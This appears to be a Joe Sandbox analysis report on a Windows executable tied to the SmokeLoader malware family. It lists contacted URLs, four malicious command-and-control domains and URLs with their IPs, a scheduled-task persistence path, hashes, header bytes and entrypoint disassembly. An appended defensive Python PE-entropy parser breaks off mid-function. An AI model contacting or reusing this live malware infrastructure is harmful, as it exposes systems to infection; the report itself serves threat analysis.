http://schemas.micro | 0% | URL Reputation | safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | 0% | URL Reputation | safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | 0% | URL Reputation | safe
https://api.msn.com/q | 0% | URL Reputation | safe
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | 0% | URL Reputation | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | URL Reputation | safe
https://wns.windows.com/L | 0% | URL Reputation | safe
https://word.office.com | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://aka.ms/Vh5j3k | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | 0% | URL Reputation | safe
https://api.msn.com/v1/news/Feed/Windows?& | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | 0% | URL Reputation | safe
https://www.rd.com/list/polite-habits-campers-dislike/ | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
https://api.msn.com/ | 0% | URL Reputation | safe
https://outlook.com_ | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tnc-corp.ru | 189.164.127.217 | true | true | | unknown
volisc.biz | unknown | unknown | true | | unknown
liverds.at | unknown | unknown | true | | unknown
livbev.online | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://volisc.biz/tmp/index.php | true | | unknown
http://livbev.online/tmp/index.php | true | | unknown
http://liverds.at/tmp/index.php | true | | unknown
http://tnc-corp.ru/tmp/index.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/odirmr | explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://powerpoint.office.comcember | explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://excel.office.com | explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 00000001.00000000.1845946637.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1844459297.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1845010581.0000000008720000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/q | explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000001.00000000.1847015156.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A | explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000001.00000000.1847015156.000000000C964000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://wns.windows.com/L | explorer.exe, 00000001.00000000.1847015156.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://word.office.com | explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://aka.ms/Vh5j3k | explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.msn.com/v1/news/Feed/Windows?& | explorer.exe, 00000001.00000000.1845367065.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/ | explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.com_ | explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com:443/en-us/feed | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of | explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
201.124.145.196 | unknown | Mexico | 8151 | UninetSAdeCVMX | true
189.164.127.217 | tnc-corp.ru | Mexico | 8151 | UninetSAdeCVMX | true
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1541371
                                                      Start date and time:2024-10-24 18:36:08 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 3s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:kGSZ4dCqYh.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:bab1912f10355b913050217669acc322.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@3/2@83/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 30
                                                      • Number of non-executed functions: 19
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.190.159.2, 40.126.31.67, 40.126.31.71, 20.190.159.0, 40.126.31.69, 20.190.159.4, 20.190.159.71, 20.190.159.75
                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: kGSZ4dCqYh.exe
Time | Type | Description
12:37:33 | API Interceptor | 455513x Sleep call for process: explorer.exe modified
17:37:35 | Task Scheduler | Run new task: Firefox Default Browser Agent D2CFCEFC1E900624 path: C:\Users\user\AppData\Roaming\dvjdfvr
                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
tnc-corp.ru | file.exe | malicious | SmokeLoader | 200.45.93.45
 | fCyPLsvl8A.exe | malicious | SmokeLoader | 212.112.110.243
 | file.exe | malicious | SmokeLoader | 186.10.35.76
 | KmVfT4SeZB.exe | malicious | SmokeLoader | 109.175.29.39
 | file.exe | malicious | SmokeLoader | 92.36.226.66
 | setup3.exe | malicious | SmokeLoader | 151.233.51.166
 | 2Qvkmk7HGr.exe | malicious | SmokeLoader | 211.171.233.126
 | file.exe | malicious | SmokeLoader | 187.204.28.205
 | Ypp1MuoIa1.exe | malicious | SmokeLoader | 190.220.21.28
 | 5iwz8543Xc.exe | malicious | SmokeLoader | 190.146.112.188
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UninetSAdeCVMX | keldRUiaay.elf | malicious | Mirai | 189.189.133.229
 | powerpc.elf | malicious | Unknown | 189.176.110.248
 | la.bot.mipsel.elf | malicious | Unknown | 201.129.155.182
 | x86.elf | malicious | Unknown | 201.135.33.67
 | la.bot.sparc.elf | malicious | Unknown | 187.222.95.97
 | botnet.sh4.elf | malicious | Mirai, Moobot | 201.111.54.93
 | botnet.m68k.elf | malicious | Mirai, Moobot | 189.158.101.27
 | la.bot.arm5.elf | malicious | Unknown | 187.141.238.128
 | la.bot.sh4.elf | malicious | Unknown | 189.157.241.183
 | na.elf | malicious | Unknown | 187.171.251.143
                                                      No context
                                                      No context
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 399360
Entropy (8bit): 6.446097347649339
Encrypted: false
SSDEEP: 6144:StLH/6zftGuIHMvxZ8NQhrOjAx99iqyyvw9R81aPFhbpxA5HcH/kWTW:SqfIu2GmOssxyyIL81aPFhtGuj
MD5: BAB1912F10355B913050217669ACC322
SHA1: 17848E8AA5E443C06D495C500E642BE0967CABE6
SHA-256: 38DC7521A2E99FB4C095F74B51DADF8B10FDF680ECBCECB419E6720E8151096D
SHA-512: A96A1B0190A97E1D61AE00D82E85AB720A80C976D0F450EEAA4A9237EA337DC674746E23C458AA3023044CB7F9B6AD9D39A73C4401875876192D14FC437D012A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 39%
Reputation: low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L....z.d.................r...\.......:............@.................................=.......................................tw..<.......X+......................H....................................&..@............................................text....p.......r.................. ..`.data...\........`...v..............@....rsrc...X+.......,..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
                                                      Preview:[ZoneTransfer]....ZoneId=0
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.446097347649339
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: kGSZ4dCqYh.exe
File size: 399,360 bytes
MD5: bab1912f10355b913050217669acc322
SHA1: 17848e8aa5e443c06d495c500e642be0967cabe6
SHA256: 38dc7521a2e99fb4c095f74b51dadf8b10fdf680ecbcecb419e6720e8151096d
SHA512: a96a1b0190a97e1d61ae00d82e85ab720a80c976d0f450eeaa4a9237ea337dc674746e23c458aa3023044cb7f9b6ad9d39a73c4401875876192d14fc437d012a
SSDEEP: 6144:StLH/6zftGuIHMvxZ8NQhrOjAx99iqyyvw9R81aPFhbpxA5HcH/kWTW:SqfIu2GmOssxyyIL81aPFhtGuj
TLSH: 4C84E1113AA0F870C5520E304D28D3E97ABEFC729A64598B371C7F5F7C39391A6A6706
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L....z.d...........
Icon Hash: 63796de971436e0f
Entrypoint: 0x403a18
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x64F07A8F [Thu Aug 31 11:33:35 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 60292dd185c67d0ddd8dc10e8ecfb2bb
                                                      Instruction
                                                      call 00007F1F98815669h
                                                      jmp 00007F1F98810E8Eh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      call 00007F1F9881104Ch
                                                      xchg cl, ch
                                                      jmp 00007F1F98811034h
                                                      call 00007F1F98811043h
                                                      fxch st(0), st(1)
                                                      jmp 00007F1F9881102Bh
                                                      fabs
                                                      fld1
                                                      mov ch, cl
                                                      xor cl, cl
                                                      jmp 00007F1F98811021h
                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fpatan
                                                      or cl, cl
                                                      je 00007F1F98811016h
                                                      fldpi
                                                      fsubrp st(1), st(0)
                                                      or ch, ch
                                                      je 00007F1F98811014h
                                                      fchs
                                                      ret
                                                      fabs
                                                      fld st(0), st(0)
                                                      fld st(0), st(0)
                                                      fld1
                                                      fsubrp st(1), st(0)
                                                      fxch st(0), st(1)
                                                      fld1
                                                      faddp st(1), st(0)
                                                      fmulp st(1), st(0)
                                                      ftst
                                                      wait
                                                      fstsw word ptr [ebp-000000A0h]
                                                      wait
                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                      jne 00007F1F98811017h
                                                      xor ch, ch
                                                      fsqrt
                                                      ret
                                                      pop eax
                                                      jmp 00007F1F9881582Fh
                                                      fstp st(0)
                                                      fld tbyte ptr [004497EAh]
                                                      ret
                                                      fstp st(0)
                                                      or cl, cl
                                                      je 00007F1F9881101Dh
                                                      fstp st(0)
                                                      fldpi
                                                      or ch, ch
                                                      je 00007F1F98811014h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      fldz
                                                      or ch, ch
                                                      je 00007F1F98811009h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      jmp 00007F1F98815805h
                                                      fstp st(0)
                                                      mov cl, ch
                                                      jmp 00007F1F98811012h
                                                      call 00007F1F98810FDEh
                                                      jmp 00007F1F98815810h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      Programming Language:
                                                      • [C++] VS2008 build 21022
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47774 | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5b000 | 0x12b58 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6e000 | 0xa48 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2690 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x19c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x470d4 | 0x47200 | fdfc02f95441d5de39fe3ca16d404bde | False | 0.7339939861599297 | OpenPGP Secret Key Version 4 | 7.014294223606666 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x49000 | 0x1185c | 0x6000 | 27249428db74ea0fe3ff506f8860ff3d | False | 0.07784016927083333 | Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 0 | 0.9053342754782987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5b000 | 0x12b58 | 0x12c00 | e8d4a5e3d5fb7eafd6df3aa7ac23f8f5 | False | 0.40013020833333335 | data | 5.021811724306864 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6e000 | 0x14be | 0x1600 | 7ce203f0c14ffae82977c4b4b95d3fda | False | 0.4053622159090909 | data | 3.9742437726842943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
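The section table above is the static evidence behind the report's unpacking verdict: the .text section scores 7.01 bits/byte of entropy and compresses poorly (ZLIB 0.73), which is what encrypted or packed code looks like, while plain compiled x86 code sits well below that. The script below is an added example written for this page, not code from the Joe Sandbox report or from the malware: a minimal PE32 section-table parser that recomputes per-section entropy, zlib compressibility and characteristics, and raises the two flags an analyst checks first, a high-entropy executable section and a section that is both writable and executable. The PE image it scores is constructed in build_pe() so the script runs offline; the HIGH_ENTROPY threshold and the demo section contents are assumptions. For a real sample, call parse_sections(open(path, "rb").read()).

```python
# Added example (not from the Joe Sandbox report): minimal PE32 section parser with
# the entropy / zlib / characteristics checks a triage analyst runs by hand.
import hashlib
import math
import struct
import zlib

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

HIGH_ENTROPY = 7.0     # assumption: plain compiled x86 code usually scores about 6.0-6.6 bits/byte
FILE_ALIGN = 0x200
SECTION_ALIGN = 0x1000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_ratio(data: bytes) -> float:
    """Compressed size / raw size (the report's 'ZLIB Complexity'); about 1.0 means incompressible."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table; scores each section's raw bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    table = coff + 20 + struct.unpack_from("<H", pe, coff + 16)[0]   # skip the optional header
    sections = []
    for i in range(nsections):
        off = table + 40 * i
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw), "zlib_ratio": zlib_ratio(raw),
                         "characteristics": chars})
    return sections


def triage_flags(section: dict) -> list:
    """The two section-level indicators worth a second look in a loader sample."""
    c = section["characteristics"]
    flags = []
    if c & IMAGE_SCN_MEM_EXECUTE and section["entropy"] >= HIGH_ENTROPY:
        flags.append("high-entropy executable section (packed or encrypted code)")
    if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
        flags.append("writable and executable section")
    return flags


def _align(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def build_pe(sections: list) -> bytes:
    """Assemble a minimal PE32 file from (name, data, characteristics) triples: DOS header,
    PE signature, COFF header, zeroed PE32 optional header, section table, raw section data."""
    n, optional_size = len(sections), 224
    headers_len = _align(0x40 + 4 + 20 + optional_size + 40 * n, FILE_ALIGN)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                        # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, optional_size, 0x0102)  # i386, EXE, 32-bit
    optional = struct.pack("<H", 0x10B) + b"\0" * (optional_size - 2)         # PE32 magic only
    table, body, raw_ptr, vaddr = b"", b"", headers_len, SECTION_ALIGN
    for name, data, chars in sections:
        raw_size = _align(len(data), FILE_ALIGN)
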